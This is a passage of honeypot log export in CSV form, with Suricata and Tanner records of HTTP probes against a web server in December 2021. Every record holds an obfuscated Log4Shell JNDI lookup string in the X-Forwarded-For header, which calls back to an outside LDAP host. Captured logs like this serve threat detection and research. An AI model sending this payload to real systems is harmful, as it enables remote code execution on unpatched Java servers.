Safari/537.36",4958,"HTTP/1.1",200,"/core/img/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4651476,,"{""timestamp"":""2021-12-15T05:16:46.053460+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.97.119"",""dest_port"":40896,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4958},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/img/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 1 icon, 34x34, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""e467554976ad3162eec9dfbf83e2c324"",""stored"":false,""size"":4958,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:46.053460+0000",,,,,,,,,Suricata,,,,
"2021-12-15T05:16:45.979Z",1,5KyFvH0BCXMCNTQLo0rq,"logstash-tanner-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"2d0314f8-1c53-4438-94dd-e69678129f83",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=2d0314f8-1c53-4438-94dd-e69678129f83",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",633eb5019b79,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",5237,,"{""method"": ""GET"", ""path"": ""/core/img/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=2d0314f8-1c53-4438-94dd-e69678129f83""}, ""uuid"": ""feb133cc-317a-4814-a38c-b7d6ac3cbd03"", ""peer"": {""ip"": ""159.65.97.119"", ""port"": 40896}, ""status"": 200, ""cookies"": {""sess_uuid"": ""2d0314f8-1c53-4438-94dd-e69678129f83""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6b1a15b4-b2f6-4ddc-ba2b-cb018e0e97cb""}}}, ""timestamp"": ""2021-12-15T05:16:45.979357""}",,,,,,GET,,,,,,"/core/img/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","6b1a15b4-b2f6-4ddc-ba2b-cb018e0e97cb","0.6.0",,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,200,,,distincthose,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.979357",,,,,,,,,Tanner,,,"feb133cc-317a-4814-a38c-b7d6ac3cbd03",
"2021-12-15T05:16:45.967Z",1,RBeFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1213961672130821,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,633eb5019b79,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4649337,,"{""timestamp"":""2021-12-15T05:16:45.967690+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.97.119"",""src_port"":40896,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.967690+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T05:16:45.967Z",1,RReFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.97.119",40896,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",838827d66cb0bd3693641815c694ca88,"[]",208,CLOSED,false,1,,,,,,,1213961672130821,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,633eb5019b79,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4649989,,"{""timestamp"":""2021-12-15T05:16:45.967690+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.97.119"",""dest_port"":40896,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""838827d66cb0bd3693641815c694ca88"",""stored"":false,""size"":208,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.967690+0000",,,,,,,,,Suricata,,,,
"2021-12-15T05:16:45.897Z",1,"lxeFvH0B5e7x5EYno-jY","logstash-tanner-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"2d0314f8-1c53-4438-94dd-e69678129f83",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=2d0314f8-1c53-4438-94dd-e69678129f83",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",633eb5019b79,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",4353,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=2d0314f8-1c53-4438-94dd-e69678129f83""}, ""uuid"": ""feb133cc-317a-4814-a38c-b7d6ac3cbd03"", ""peer"": {""ip"": ""159.65.97.119"", ""port"": 40896}, ""status"": 200, ""cookies"": {""sess_uuid"": ""2d0314f8-1c53-4438-94dd-e69678129f83""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6b1a15b4-b2f6-4ddc-ba2b-cb018e0e97cb""}}}, ""timestamp"": ""2021-12-15T05:16:45.897923""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","6b1a15b4-b2f6-4ddc-ba2b-cb018e0e97cb","0.6.0",,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,200,,,distincthose,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.897923",,,,,,,,,Tanner,,,"feb133cc-317a-4814-a38c-b7d6ac3cbd03",
"2021-12-15T05:16:45.879Z",1,QxeFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"159.65.97.119",40896,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,1213961672130821,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,633eb5019b79,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4648535,,"{""timestamp"":""2021-12-15T05:16:45.879392+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""159.65.97.119"",""dest_port"":40896,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.879392+0000",,,,,,,,,Suricata,,,,
"2021-12-15T05:16:45.879Z",1,QheFvH0B5e7x5EYnnehz,"logstash-suricata-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1213961672130821,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,633eb5019b79,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4647893,,"{""timestamp"":""2021-12-15T05:16:45.879392+0000"",""flow_id"":1213961672130821,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""159.65.97.119"",""src_port"":40896,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.879392+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T05:16:45.794Z",1,rXqFvH0B6VkG8jKzo7HW,"logstash-tanner-2021.12.15",,"_doc","b4d59f1e-8a57-4097-80b4-6407af1fac95",633eb5019b79,"17ffd2cf-f0ad-4f82-bf80-a1bffe3bbaf8",633eb5019b79,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"159.65.97.119","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",633eb5019b79,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",3574,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""feb133cc-317a-4814-a38c-b7d6ac3cbd03"", ""peer"": {""ip"": ""159.65.97.119"", ""port"": 40896}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""2d0314f8-1c53-4438-94dd-e69678129f83""}}}, ""timestamp"": ""2021-12-15T05:16:45.794950""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","2d0314f8-1c53-4438-94dd-e69678129f83","0.6.0",,,,,,,,,,,,,,,,,,"159.65.97.119",40896,,,,,,,,,200,,,distincthose,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T05:16:45.794950",,,,,,,,,Tanner,,,"feb133cc-317a-4814-a38c-b7d6ac3cbd03",
"2021-12-15T04:37:49.147Z",1,FHlhvH0B6VkG8jKz3CLk,"logstash-suricata-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"165.22.231.66",40366,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, Unicode text, UTF-8 text, with very long lines (370)",61aeec46a50c9ea8268014d2e7f0c0ef,"[]",50195,CLOSED,false,1,,,,,,,63651165489715,,,,NA,US,US,"United States",,"172.16.0.42","35.2296","{""lon"":-80.843,""lat"":35.2296}","-80.843",,NC,"North Carolina","America/New_York",,,,,,,,,,,,,,,1cfdf650501c,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",50195,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",773098,,"{""timestamp"":""2021-12-15T04:37:49.147079+0000"",""flow_id"":63651165489715,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""165.22.231.66"",""dest_port"":40366,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":50195},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (370)"",""gaps"":false,""state"":""CLOSED"",""md5"":""61aeec46a50c9ea8268014d2e7f0c0ef"",""stored"":false,""size"":50195,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:49.147079+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:37:49.147Z",1,E3lhvH0B6VkG8jKz3CLk,"logstash-suricata-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,63651165489715,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,1cfdf650501c,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",50195,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",772446,,"{""timestamp"":""2021-12-15T04:37:49.147079+0000"",""flow_id"":63651165489715,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.22.231.66"",""src_port"":40366,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":50195}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",40366,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:49.147079+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T04:37:49.110Z",1,VaphvH0BCXMCNTQL5MoQ,"logstash-tanner-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"9b7027c9-70fb-4e2c-a98b-7067f6612628",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=9b7027c9-70fb-4e2c-a98b-7067f6612628",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",1cfdf650501c,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",5975,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=9b7027c9-70fb-4e2c-a98b-7067f6612628""}, ""uuid"": ""655e7949-87b2-4518-bb03-916470861a18"", ""peer"": {""ip"": ""165.22.231.66"", ""port"": 40366}, ""status"": 200, ""cookies"": {""sess_uuid"": ""9b7027c9-70fb-4e2c-a98b-7067f6612628""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""02963996-99f6-4665-9f63-a533d1ba9360""}}}, ""timestamp"": ""2021-12-15T04:37:49.110734""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","02963996-99f6-4665-9f63-a533d1ba9360","0.6.0",,,,,,,,,,,,,,,,,,"165.22.231.66",40366,,,,,,,,,200,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:49.110734",,,,,,,,,Tanner,,,"655e7949-87b2-4518-bb03-916470861a18",
"2021-12-15T04:37:48.142Z",1,EXlhvH0B6VkG8jKz3CLk,"logstash-suricata-2021.12.15",,"_doc","515176a4-579a-4537-b388-8ddbb4052e4d",1cfdf650501c,"e0271bff-cac9-4c26-8dd0-3bb24343acf1",1cfdf650501c,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,63651165489715,,,Toronto,NA,CA,CA,Canada,,"165.22.231.66","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,1cfdf650501c,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",52671,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",770960,,"{""timestamp"":""2021-12-15T04:37:48.142592+0000"",""flow_id"":63651165489715,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.22.231.66"",""src_port"":40366,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":52671}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.22.231.66",40366,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:37:48.142592+0000",,,,,,,,0,Suricata,,,,
